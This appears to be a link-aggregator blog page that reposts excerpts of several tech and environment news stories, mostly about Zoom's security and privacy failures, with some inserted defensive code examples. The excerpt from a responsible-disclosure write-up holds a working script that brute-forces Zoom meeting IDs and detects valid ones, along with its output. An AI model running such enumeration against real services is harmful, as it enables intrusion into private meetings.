The Linkielist

Linking ideas with the world

Report reveals ‘massive plastic pollution footprint’ of drinks firms

Four global drinks giants are responsible for more than half a million tonnes of plastic pollution in six developing countries each year, enough to cover 83 football pitches every day, according to a report.

The NGO Tearfund has calculated the greenhouse gas emissions from the open burning of plastic bottles, sachets and cartons produced by Coca-Cola, PepsiCo, Nestlé and Unilever in developing nations, where waste can be mismanaged because people do not have access to collections.

Taking a sample of six developing countries, reflecting a spread across the globe, the NGO estimated the burning of plastic packaging put on to the market by the companies creates 4.6m tonnes of carbon dioxide equivalent – equivalent to the emissions from 2m cars.

Tearfund analysed the plastic put on the market in China, India, the Philippines, Brazil, Mexico and Nigeria by the four companies to examine the impact of single-use plastic in developing countries. The countries were chosen because they are large developing-country markets, spread across three continents.

The sachets, bottles, and cartons sold in these countries often end up either being burned or dumped – creating a pollution problem equivalent to covering 83 football pitches with plastic to 10 centimetres deep each day.

The report says: “This massive plastic pollution footprint, while a crisis in and of itself, is also contributing to the climate crisis.”

It adds that the four companies make little or no mention of emissions from disposal of their products or packaging in their climate change commitments.

“These companies continue to sell billions of products in single-use bottles, sachets and packets in developing countries,” says the report.

“And they do this despite knowing that: waste isn’t properly managed in these contexts; their packaging therefore becomes pollution; and such pollution causes serious harm to the environment and people’s health. Such actions – with such knowledge – are morally indefensible.”

The charity is calling for the companies to urgently switch to refillable and reusable packaging instead of sachets and plastic bottles.

The NGO estimated how much of their plastic waste in each country is mismanaged, burned or dumped using World Bank data.

Source: Report reveals ‘massive plastic pollution footprint’ of drinks firms | Environment | The Guardian

Apple’s latest macOS Catalina update mysteriously borks SSH for some unlucky fans. What could be the cause?

Apple’s latest update to macOS Catalina appears to have broken SSH for some users.

Developer Tyler Hall published a blog post on Monday detailing the issue, but removed it after his writeup got noticed.

The issue is that under Apple’s macOS 10.15.4 update, released on March 24, trying to open an SSH connection to a port greater than 8192 using a server name, rather than an IP address, no longer works – for some users at least. SSH is a Swiss army knife that can be used to securely connect to remote machines to run commands, transfer files and other data, and so on.

The Register asked Hall to elaborate on his findings but he declined, citing the possibility that the problem might be particular to his set up rather than a bug in the software Apple shipped.

Hall demonstrated similar post-publication remorse this last October when he criticized the code quality of macOS Catalina, comparing it to Windows Vista. That sentiment is shared among many other macOS users (eg: “macOS 10.15 is chockablock with paper-cut bugs” – John Gruber). But the responses Hall received from friends within Apple led him to regret that post, too.

We asked Apple to comment but we’ve received no reply. Cupertino seldom addresses public criticism. Until June 2016, Apple even implied in its App Store Review Guidelines that it would look unfavorably on developers who complain publicly about rejected apps. Up to that point, its policy said, “If you run to the press and trash us, it never helps.”

The US government’s renewed antitrust scrutiny of companies like Amazon, Apple, Facebook, and Google in recent years has perhaps encouraged more caution in publicly declared tech platform policies.

The issue that Hall reported has been noted by others. A post two days ago on Apple’s discussion forum complains, “After that update I am no longer able to open a SSH connection to a port greater than 8192 using server name (instead of IP).” And three discussion participants claim they too have experienced the same issue.

One of these individuals, posting under the user name “webdeck,” filed a bug report in Open Radar, a public iOS and macOS bug reporting site created by developer Tim Burks because Apple hides its Radar bug reporting system from the public.

The bug report reads, “/usr/bin/ssh in macos 10.15.4 hangs if used with the -p flag to specify an alternate port and used with a hostname. This was not present in macOS 10.15.3.”

Source: Apple’s latest macOS Catalina update mysteriously borks SSH for some unlucky fans. What could be the cause? • The Register

OpenWRT code-execution bug found – update!

For almost three years, OpenWRT—the open source operating system that powers home routers and other types of embedded systems—has been vulnerable to remote code-execution attacks because updates were delivered over an unencrypted channel and digital signature verifications are easy to bypass, a researcher said.

OpenWRT has a loyal base of users who use the freely available package as an alternative to the firmware that comes installed on their devices. Besides routers, OpenWRT runs on smartphones, pocket computers and even laptops and desktop PCs. Users generally find OpenWRT to be a more secure choice because it offers advanced functions and its source code is easy to audit.

Security researcher Guido Vranken, however, recently found that updates and installation files were delivered over unencrypted HTTP connections, which are open to attacks that allow adversaries to completely replace legitimate updates with malicious ones. The researcher also found that it was trivial for attackers with moderate experience to bypass digital-signature checks that verify a downloaded update as the legitimate one offered by OpenWRT maintainers. The combination of those two lapses makes it possible to send a malicious update that vulnerable devices will automatically install.

Exploits not for everyone

These code-execution exploits are limited in their scope because adversaries must either be in a position to conduct a man-in-the-middle attack or tamper with the DNS server that a device uses to find the update on the Internet. That means routers on a network that has no malicious users and that use a legitimate DNS server are safe from attack. Vranken also speculates that packet spoofing or ARP cache poisoning could make attacks possible, but he cautions that he didn’t test either method.
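The two lapses described above (a plaintext download channel and an integrity check that can be skipped) are worth seeing as code from the defender’s side. The block below is an added illustration and is not OpenWRT’s or opkg’s code: it parses a constructed package index whose field names imitate a Packages file, refuses any non-HTTPS download URL, and treats a missing or malformed hash as a rejection rather than something to skip. It assumes the index itself has already been authenticated (for example by a signature check on the index file) and only demonstrates the per-package integrity step; the package bodies, hostnames and package names are constructed.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Added illustration, not OpenWRT's or opkg's code: an update verifier that
# fails closed on transport, size and hash problems.


class UpdateRejected(Exception):
    pass


def parse_index(text):
    """Parse blank-line-separated 'Key: value' stanzas into {package: {field: value}}.
    The layout imitates a Packages index; the content used below is constructed."""
    packages, current = {}, {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                packages[current["Package"]] = current
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        packages[current["Package"]] = current
    return packages


def _usable_sha256(value):
    """A hash field is usable only if it is exactly 64 hex characters."""
    return (value is not None and len(value) == 64
            and all(c in "0123456789abcdef" for c in value.lower()))


def verify_download(entry, url, blob):
    """Raise UpdateRejected unless url is HTTPS and blob matches the index entry's
    Size and SHA256sum. A missing or malformed hash is a rejection, never a skip."""
    if urlparse(url).scheme != "https":
        raise UpdateRejected("plaintext transport")
    expected = entry.get("SHA256sum")
    if not _usable_sha256(expected):
        raise UpdateRejected("index entry has no usable SHA256sum")
    if str(len(blob)) != entry.get("Size"):
        raise UpdateRejected("size mismatch")
    actual = hashlib.sha256(blob).hexdigest()
    if not hmac.compare_digest(actual, expected.lower()):
        raise UpdateRejected("hash mismatch")
    return True


def check(packages, name, url, blob):
    """Convenience wrapper returning 'ok' or 'rejected: <reason>'."""
    try:
        verify_download(packages[name], url, blob)
        return "ok"
    except (UpdateRejected, KeyError) as exc:
        return "rejected: {}".format(exc)


# Constructed sample package bodies and index (not real OpenWRT packages).
GOOD_BLOB = b"\x7fELF-constructed-package-payload"
TAMPERED_BLOB = b"\x7fELF-constructed-package-payloaX"   # same size, one byte changed
INDEX_TEXT = """Package: demo-good
Version: 1.0
Size: {size}
SHA256sum: {digest}

Package: demo-nohash
Version: 1.0
Size: 5
""".format(size=len(GOOD_BLOB), digest=hashlib.sha256(GOOD_BLOB).hexdigest())
PACKAGES = parse_index(INDEX_TEXT)

if __name__ == "__main__":
    for name, url, blob in [
        ("demo-good", "https://downloads.example.net/demo-good.ipk", GOOD_BLOB),
        ("demo-good", "http://downloads.example.net/demo-good.ipk", GOOD_BLOB),
        ("demo-good", "https://downloads.example.net/demo-good.ipk", TAMPERED_BLOB),
        ("demo-nohash", "https://downloads.example.net/demo-nohash.ipk", b"hello"),
    ]:
        print(name, url.split(":")[0], check(PACKAGES, name, url, blob))
```

The point of the `demo-nohash` entry is the fail-closed behaviour: an index stanza that lacks a hash must block installation, because a checker that silently skips verification when the field is absent or unparseable is exactly the kind of bypass the article describes.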

Source: OpenWRT code-execution bug puts millions of devices at risk | Ars Technica

Yes! Honda Follows Mazda By Ditching Some Touchscreen Controls For Not Being ‘Intuitive’

It seemed like a bit of a risk when Mazda decided to not offer a touchscreen in the new Mazda 3. But Mazda may have just been ahead of the trend, as Honda has also abandoned some reliance on the new Honda Jazz’s touch controls because they just aren’t “intuitive.”

Despite nearly a decade of dominating conversations about automotive design and not, for some reason, the risks of distracted driving, touchscreens are finally being seen for what they really are: annoying.

Honda’s decided the air conditioning controls on the new Honda Jazz, also known as the Honda Fit in the U.S. though we won’t get this new generation, are too good for a complicated, distracting touchscreen.

Here’s why, from Autocar:

Jazz project leader Takeki Tanaka explained: “The reason is quite simple – we wanted to minimise driver disruption for operation, in particular, for the heater and air conditioning.

“We changed it from touchscreen to dial operation, as we received customer feedback that it was difficult to operate intuitively. You had to look at the screen to change the heater seating, therefore, we changed it so one can operate it without looking, giving more confidence while driving.”

And here’s the part where anyone who has reviewed a car in the last decade goes and screams into their pillow with frustration, because that’s exactly the sort of feedback automakers have been getting from focus groups, customers and reviewers for about as long as these touchscreen systems have been in cars.

Touchscreens are worse than physical controls for one very obvious reason: A touchscreen requires two human senses—touch, obviously, and sight. But with enough experience, the genius of the human brain is capable of motor memory, so dials and buttons will eventually only require the memory of where they’re located and a finger to touch them. Eyes can stay on the road.

Honda did this earlier by bringing the volume knob back on the 2019 Civic.

The problem is people want cool technology in their cars. They want to feel like their hard-earned loan is going toward something nice and fancy and smarter than them. This is why some people like the Tesla tablet—they think it’s efficient to put literally thousands of functions all in one very distracting toy. That’s not very safe. It’s safer to put the toys away and just turn a knob to be more comfortable.

Simplicity is the greatest efficiency, and I’m pretty jazzed for a touchscreen-less future. It’s like music to my ears.

Source: Honda Follows Mazda By Ditching Some Touchscreen Controls For Not Being ‘Intuitive’

From 2019, after a deadly 2017 crash between a destroyer and an oil tanker: The US Navy will replace its touchscreen controls with mechanical ones on its destroyers

Ubisoft offers free games to encourage you to stay at home

Ubisoft thinks it has a simple way to encourage people to stay at home and wait out the COVID-19 pandemic: shower them with games. It’s running a month-long campaign that will give away free games, trials, discounts and other offers to give you something to do while you’re cooped up. It’s starting things off by offering the PC version of Rayman Legends for free on Uplay from now through April 3rd. It’s an old title, to be sure, but it might hit the spot if you’re looking for an upbeat game to remind you that things will get better.

Future offers will be available through Ubisoft’s Free Events site.

There’s no doubt that Ubi is using this partly as a promotional tool for its catalog. You might try a game you skipped the first time around, or might feel compelled to subscribe to Uplay+ to see more. At the same time, it might be particularly useful in some households. Not everyone has a backlog of games to burn through until lockdowns come to an end, let alone the money to buy more.

Source: Ubisoft offers free games to encourage you to stay at home | Engadget

Marriott Hotels hacked AGAIN: Two compromised employee logins abused to siphon off guests’ personal info

Marriott Hotels has suffered its second data spillage in as many years after an “unexpected amount” of guests’ data was accessed through two compromised employee logins, the under-fire chain has confirmed.

The size of the latest data exposure has not been disclosed, though Marriott admitted it seemed to have started in January 2020 and was detected “at the end of February.”

“We identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property,” said Marriott, without identifying which of its 6,900 hotels worldwide was at the epicenter of the intrusion.

“Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests,” it continued.

Marriott did not explain why it took four weeks to begin alerting customers about the digital break-in.

Stolen data included name, postal and email addresses, phone numbers, Bonvoy loyalty card balance, gender, date of birth, linked loyalty scheme information from other companies and room/personal preferences.

The hotel chain asserted that credit card data, PINs, passport and driver’s licence information was not accessed by the hackers, whose identities are so far unknown.

Source: Marriott Hotels hacked AGAIN: Two compromised employee logins abused to siphon off guests’ personal info • The Register

Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers

Popular video-conferencing service Zoom is leaking personal information of at least thousands of users, including their email address and photo, and giving strangers the ability to attempt to start a video call with them through Zoom.

The issue lies in Zoom’s “Company Directory” setting, which automatically adds other people to a user’s lists of contacts if they signed up with an email address that shares the same domain. This can make it easier to find a specific colleague to call when the domain belongs to an individual company. But multiple Zoom users say they signed up with personal email addresses, and Zoom pooled them together with thousands of other people as if they all worked for the same company, exposing their personal information to one another.

“I was shocked by this! I subscribed (with an alias, fortunately) and I saw 995 people unknown to me with their names, images and mail addresses.” Barend Gehrels, a Zoom user impacted by the issue and who flagged it to Motherboard, wrote in an email.

Gehrels provided a redacted screenshot of him logged into Zoom with the nearly 1000 different accounts listed in the “Company Directory” section. He said these were “all people I don’t know of course.” He said his partner had the same issue with another email provider, and had over 300 people listed in her own contacts.

“If you subscribe to Zoom with a non-standard provider (I mean, not Gmail or Hotmail or Yahoo etc), then you get insight to ALL subscribed users of that provider: their full names, their mail addresses, their profile picture (if they have any) and their status. And you can video call them,” Gehrels said. A user still has to accept the call from the stranger for it to start, however.

A redacted screenshot of the Company Directory issue provided by Gehrels. Image: Motherboard

On its website, Zoom says, “By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or whose email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section.”

Zoom’s system does not exempt all domains that are used for personal email, however. Gehrels said he encountered the issue with the domains xs4all.nl, dds.nl, and quicknet.nl. These are all Dutch internet service providers (ISPs) which offer email services.

On Twitter Motherboard found other instances of Dutch users reporting the same issue.

“I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional?,” one user tweeted last week along with a screenshot.

Dutch ISP XS4ALL tweeted in response to a complaint on Sunday, “This is something we cannot disable. You could see if Zoom can help you with this.”

Dutch ISP DDS told Motherboard in an email it was aware of the issue, but hadn’t heard directly from any of their own customers about it.

“Zoom maintains a blacklist of domains and regularly proactively identifies domains to be added,” a Zoom spokesperson told Motherboard. “With regards to the specific domains that you highlighted in your note, those are now blacklisted.” They also pointed to a section of the Zoom website where users can request other domains to be removed from the Company Directory feature.
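The design flaw in the article is a grouping rule that fails open: every domain that is not on a blacklist of known public providers is presumed to be a single company. The block below is an added illustration, not Zoom’s code, that puts that denylist policy beside the fail-closed alternative, where only domains an administrator has verified are grouped. The sign-ups, the example-corp.com domain and the verified-domain set are constructed; xs4all.nl is one of the ISP domains the article names, and the three public domains are the ones Zoom’s own text lists.

```python
from collections import defaultdict

# Added illustration, not Zoom's code: two policies for auto-populating a
# "company directory" from the domain of the sign-up email address.

# Public-mail domains the page says Zoom exempts by default.
PUBLIC_DOMAIN_DENYLIST = {"gmail.com", "yahoo.com", "hotmail.com"}

# Assumed: domains an administrator has proved ownership of (e.g. via a DNS record).
VERIFIED_ORG_DOMAINS = {"example-corp.com"}

# Constructed sample sign-ups. xs4all.nl is a consumer ISP mail domain named
# in the article, not a company; it is absent from the denylist.
SIGNUPS = [
    ("alice@example-corp.com", "Alice"),
    ("bob@example-corp.com", "Bob"),
    ("carol@gmail.com", "Carol"),
    ("dave@gmail.com", "Dave"),
    ("erik@xs4all.nl", "Erik"),
    ("femke@xs4all.nl", "Femke"),
]


def domain_of(email):
    return email.rsplit("@", 1)[1].lower()


def _group_by_domain(signups, is_org_domain):
    """Build {domain: [(email, name)]} for every domain the policy treats as an org."""
    groups = defaultdict(list)
    for email, name in signups:
        domain = domain_of(email)
        if is_org_domain(domain):
            groups[domain].append((email, name))
    return dict(groups)


def directory_by_denylist(signups, denylist=PUBLIC_DOMAIN_DENYLIST):
    """Fails open: any domain not on the denylist is assumed to be one company,
    so users of an unlisted ISP or personal mail provider are shown to each other."""
    return _group_by_domain(signups, lambda d: d not in denylist)


def directory_by_allowlist(signups, verified=VERIFIED_ORG_DOMAINS):
    """Fails closed: only verified organization domains are grouped; everyone
    else gets an empty directory until their organization claims its domain."""
    return _group_by_domain(signups, lambda d: d in verified)


def visible_contacts(directory, email):
    """Names one user can see in their directory under a policy (excluding self)."""
    return sorted(name for other, name in directory.get(domain_of(email), [])
                  if other != email)


if __name__ == "__main__":
    for label, build in (("denylist", directory_by_denylist),
                         ("allowlist", directory_by_allowlist)):
        print(label, "erik@xs4all.nl sees:",
              visible_contacts(build(SIGNUPS), "erik@xs4all.nl"))
```

Under the denylist policy Erik sees Femke, a stranger who merely uses the same ISP; under the allowlist policy he sees nobody, while the two example-corp.com users still see each other. Maintaining the blacklist, as the Zoom spokesperson describes, only narrows the exposure to whichever shared domains nobody has reported yet.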

Source: Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers – VICE

Zoom: how you were able to join random meetings due to incredibly poor security design

In this publication we describe a technique which would have allowed a threat actor to potentially identify and join active meetings.

All the details discussed in this publication were responsibly disclosed to Zoom Video Communications, Inc. In response, Zoom introduced a number of mitigations, so this attack is no longer possible.

The Problem

If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 digits. The problem was that if you hadn’t enabled the “Require meeting password” option or enabled Waiting Room, which allows manual admission of participants, these 9, 10 or 11 digits were the only thing that secured your meeting, i.e. prevented an unauthorized person from connecting to it.

Let Me Guess…
The first thing we did was pre-generate the list of potentially valid Zoom Meeting IDs. We took 1000 “random” Meeting IDs and prepared the join URL for each of them:

from random import randint

urls = []
for _ in range(1000):
    urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))

But how could we determine if a Zoom Meeting ID represented a valid meeting or not? We discovered a fast and easy way to check this based on the following “div” element present in the HTML body of the returned response when accessing the “Join Meeting” URL (https://zoom.us/j/{MEETING_ID}):

<div id="join-errormsg" class="error"><i></i><span>Invalid meeting ID.</span></div>

I Found It!
We then tried to automate the described approach (just in case you don’t want to brute force all the Meeting IDs by hand):

def start_requests():
    for url in urls:
        yield MakeHTTPRequest(url=url, callback=parseResponse)

def MakeHTTPRequest(url, callback):
    # Request body omitted in the original write-up; the callback is meant to
    # receive the HTTP response for the join URL.
    ...

def parseResponse(response):
    # The join page carries div#join-errormsg only when the ID is invalid.
    if response.css('div#join-errormsg').get() is None:
        print('Valid Meeting ID found: {}'.format(response.url))
    else:
        print('Invalid Meeting ID')

…and look at the output:

Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/22XXX41X8
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5
Invalid Meeting ID
Invalid Meeting ID

Bingo!

Results
We were able to predict ~4% of randomly generated Meeting IDs, which is a very high chance of success compared to pure brute force.

Mitigation

We contacted Zoom on July 22, 2019 as part of a responsible disclosure process and proposed the following mitigations:
  1. Re-implement the generation algorithm of Meeting IDs.
  2. Replace the randomization function with a cryptographically strong one.
  3. Increase the number of digits/symbols in the Meeting IDs.
  4. Force hosts to use passwords/PINs/SSO for authorization purposes.

Zoom representatives were very collaborative and responded quickly to our emails. Here is the list of changes that were introduced to the Zoom client/infrastructure following our disclosure:

  1. Passwords are added by default to all future scheduled meetings.
  2. Users are able to add a password to already-scheduled future meetings and have received instructions by email on how to do so. See article for instructions: https://support.zoom.us/hc/en-us/articles/360033331271-Account-Setting-Update-Password-Default-for-Meeting-and-Webinar
  3. Password settings are enforceable at the account level and group level by the account admin.
  4. Zoom will no longer automatically indicate if a meeting ID is valid or invalid. For each attempt, the page will load and attempt to join the meeting. Thus, a bad actor will not be able to quickly narrow the pool of meetings to attempt to join.
  5. Repeated attempts to scan for meeting IDs will cause a device to be blocked for a period of time.
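To make the mitigation list concrete, here is an added example, not Zoom’s code and not Check Point’s, of a join service built the way the changes above describe: meeting IDs drawn from a cryptographically strong generator, a password on by default, one indistinguishable answer for “no such meeting” and “wrong password” (so a scanner cannot narrow the pool the way the script above did), and a temporary block after repeated attempts from one client. The attempt threshold, block duration and the 11-digit width are assumptions; the page gives no numbers for the first two. The helper that computes the per-guess hit rate for uniformly random IDs is there to contrast with the ~4% figure reported above.

```python
import secrets
import time
from collections import defaultdict

# Added illustration, not Zoom's code: a join gateway implementing the shape of
# the mitigations described in the disclosure write-up.

ID_DIGITS = 11                # the longest ID width the write-up mentions
MAX_ATTEMPTS_PER_MINUTE = 5   # assumed threshold; the page gives no number
BLOCK_SECONDS = 600           # assumed block duration


def generate_meeting_id(digits=ID_DIGITS):
    """Draw the ID from the OS CSPRNG (secrets), zero-padded to a fixed width."""
    return "{:0{width}d}".format(secrets.randbelow(10 ** digits), width=digits)


def guess_success_probability(active_meetings, digits=ID_DIGITS):
    """Chance that one uniformly random guess hits a live meeting when IDs are
    uniform over 10**digits; compare with the ~4% the predictable IDs gave."""
    return active_meetings / 10 ** digits


class JoinGateway:
    def __init__(self, clock=time.monotonic):
        self.clock = clock                 # injectable for deterministic tests
        self.meetings = {}                 # meeting id -> password
        self.attempts = defaultdict(list)  # client -> timestamps of recent joins
        self.blocked_until = {}            # client -> time the block expires

    def schedule(self):
        """Create a meeting with a random ID and a password set by default."""
        meeting_id = generate_meeting_id()
        password = secrets.token_urlsafe(8)
        self.meetings[meeting_id] = password
        return meeting_id, password

    def join(self, client, meeting_id, password):
        now = self.clock()
        if self.blocked_until.get(client, 0) > now:
            return "blocked"
        recent = [t for t in self.attempts[client] if now - t < 60]
        recent.append(now)
        self.attempts[client] = recent
        if len(recent) > MAX_ATTEMPTS_PER_MINUTE:
            self.blocked_until[client] = now + BLOCK_SECONDS
            return "blocked"
        expected = self.meetings.get(meeting_id)
        # Both failure cases get the same reply: the client is told the join is
        # pending and learns nothing about whether the ID exists.
        if expected is None or not secrets.compare_digest(
                expected.encode(), password.encode()):
            return "pending"
        return "joined"


if __name__ == "__main__":
    gw = JoinGateway()
    mid, pw = gw.schedule()
    print("scheduled", mid)
    print("host with password:", gw.join("host", mid, pw))
    print("guest, wrong password:", gw.join("guest", mid, "nope"))
    print("guest, random id:", gw.join("guest", generate_meeting_id(), "nope"))
    print("1e6 live meetings, 11 uniform digits:", guess_success_probability(10 ** 6))
```

Note the order of checks in `join`: the block is evaluated before the password, so a client that has tripped the limit gets the same “blocked” reply regardless of whether its guess was right, and the attempt counter is updated on every call, not only on failures.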

Source: Zoom-Zoom: We Are Watching You – Check Point Research

FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings

The FBI has issued a warning about video messaging service Zoom, and New York Attorney General’s office has made an inquiry into its cybersecurity practices, after a string of disturbing incidents involving takeovers of teleconferences.

Per Agence France-Presse, malicious individuals have been taking advantage of lax security and the surge in teleconferencing during the coronavirus pandemic to pull off a trick called “Zoombombing,” in which they can join any public meeting and use the app’s screen-sharing mode to broadcast whatever they want. All Zoom meetings are public by default, and as the Verge noted, the settings to restrict screen sharing to the host of a meeting (or turn it off after a meeting starts) are hidden under menus. This means that anyone who forgets to tweak these settings, which appears to be an awful lot of people, is vulnerable to Zoombombing.

Trolls have eagerly taken the opportunity to hijack Zoom meetings and broadcast pornography, slurs, and Nazi imagery to everything from religious institutions and corporate meetings to classrooms at schools. In one incident, someone took over a Chipotle meeting on Zoom featuring musician Lauv and promptly flooded it with hardcore porn. Zoom, which has experienced an explosion in downloads during the ongoing period of social distancing, has seemed caught off guard.

On Monday, the FBI’s Boston office issued a warning that it “has received multiple reports of conferences being disrupted by pornographic and/or hate images and threatening language. As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cybersecurity efforts.” In the warning, it noted one Massachusetts incident in which an individual joined an online high school classroom hosted on Zoom to yell profanities and reveal the teacher’s home address. Another school reported an incident to the FBI in which a man with “swastika tattoos” joined a meeting; the FBI told anyone who has had a Zoom call hijacked to contact its Internet Crime Complaint Center.

A spokesperson for the NY Attorney General’s office told AFP that they had sent a letter to Zoom “with a number of questions to ensure the company is taking appropriate steps to ensure users’ privacy and security.” The spokesperson added that they were “trying to work with the company” to prevent future incidents.

This isn’t the first time Zoom has come under scrutiny. On Tuesday, a report in the Intercept found that the service guarantees end-to-end encryption for video meetings without a mobile device, but it actually uses transport encryption, allowing Zoom developers to access unencrypted audio and video content of meetings. (The Intercept noted that unlike Google, Facebook, and Microsoft, Zoom does not publish transparency reports on how many law enforcement requests for data it receives or how many it complies with.)

Zoom also recently pushed an update to nix code that sent analytics data to Facebook’s Graph API (even when Zoom users didn’t have an account on the social network) under a privacy policy that didn’t make the extent of the sharing clear. That is currently the subject of a class action lawsuit, though whether or not the suit is viable is another question. Zoom also eventually caved last year and patched a “click-to-join” feature that installed insecure local web servers on Mac machines that weren’t deleted when the app was removed, allowing remote access to the webcams of any Mac that had current or previous installations of Zoom. The company had initially defended it as a convenience feature.

“We work 24 hours a day to ensure that hospitals, universities, schools and other companies can be connected and operational,” a Zoom spokesperson told AFP. “We appreciate the interest of the New York prosecutor in these matters and are happy to deliver the requested information.”

Source: FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings